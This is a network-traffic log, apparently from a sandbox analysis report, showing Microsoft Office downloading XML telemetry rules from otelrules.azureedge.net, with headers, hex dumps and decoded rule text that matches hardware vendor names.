                                                                                                                                                                                                2024-11-23 15:54:02 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                21192.168.2.44982013.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:01 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:02 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:01 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 2980
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                x-ms-request-id: 6b6b0dda-801e-0083-096a-3cf0ae000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155401Z-174c587ffdftjz9shC1TEBsh9800000002w000000000qgb0
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:02 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                22192.168.2.44983213.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:03 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:04 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 474
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9964B277"
                                                                                                                                                                                                x-ms-request-id: 4712fcc8-d01e-002b-279a-3b25fb000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155404Z-174c587ffdf4zw2thC1TEBu340000000034000000000ps9r
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:04 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                23192.168.2.44983613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:03 UTC192OUTGET /rules/rule120614v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:04 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 467
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:08 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA6C038BC"
                                                                                                                                                                                                x-ms-request-id: ba9b913e-601e-0001-2f1a-3dfaeb000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155404Z-178bfbc474bgvl54hC1NYCsfuw00000004n000000000c3u2
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:04 UTC467INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                24192.168.2.44983413.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:03 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:04 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 632
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB6E3779E"
                                                                                                                                                                                                x-ms-request-id: d8f13441-a01e-0021-5e2d-3c814c000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155404Z-178bfbc474bmqmgjhC1NYCy16c00000004u000000000466u
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:04 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                25192.168.2.44983513.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:03 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:04 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 415
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9F6F3512"
                                                                                                                                                                                                x-ms-request-id: a6bfa609-001e-00a2-4d66-3bd4d5000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155404Z-178bfbc474bpnd5vhC1NYC4vr400000004mg00000000e9xx
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:04 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                26192.168.2.44983313.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:03 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:04 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:04 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 471
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                                                                                                ETag: "0x8DC582BB10C598B"
                                                                                                                                                                                                x-ms-request-id: 8592a006-f01e-0085-6b6a-3c88ea000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155404Z-174c587ffdf7t49mhC1TEB4qbg00000002y000000000pt8h
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:04 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                27192.168.2.44984913.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:06 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:06 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                                                                                                ETag: "0x8DC582B9018290B"
                                                                                                                                                                                                x-ms-request-id: aff2abcc-f01e-0003-4547-3c4453000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155406Z-178bfbc474bwlrhlhC1NYCy3kg00000004q0000000008zrh
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:06 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                28192.168.2.44984613.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:06 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:06 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 407
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                ETag: "0x8DC582BBAD04B7B"
                                                                                                                                                                                                x-ms-request-id: 561f43d7-f01e-0096-2f75-3b10ef000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155406Z-174c587ffdfdwxdvhC1TEB1c4n000000031000000000frum
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:06 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                29192.168.2.44984813.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:06 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:06 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                                                                                                ETag: "0x8DC582BA310DA18"
                                                                                                                                                                                                x-ms-request-id: 922c5f4e-601e-005c-577c-3bf06f000000
                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                x-azure-ref: 20241123T155406Z-174c587ffdfl22mzhC1TEBk40c00000003cg000000001mmy
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2024-11-23 15:54:06 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                30192.168.2.44984713.107.246.63443
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-11-23 15:54:06 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                2024-11-23 15:54:06 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Sat, 23 Nov 2024 15:54:06 GMT
                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                Content-Length: 486
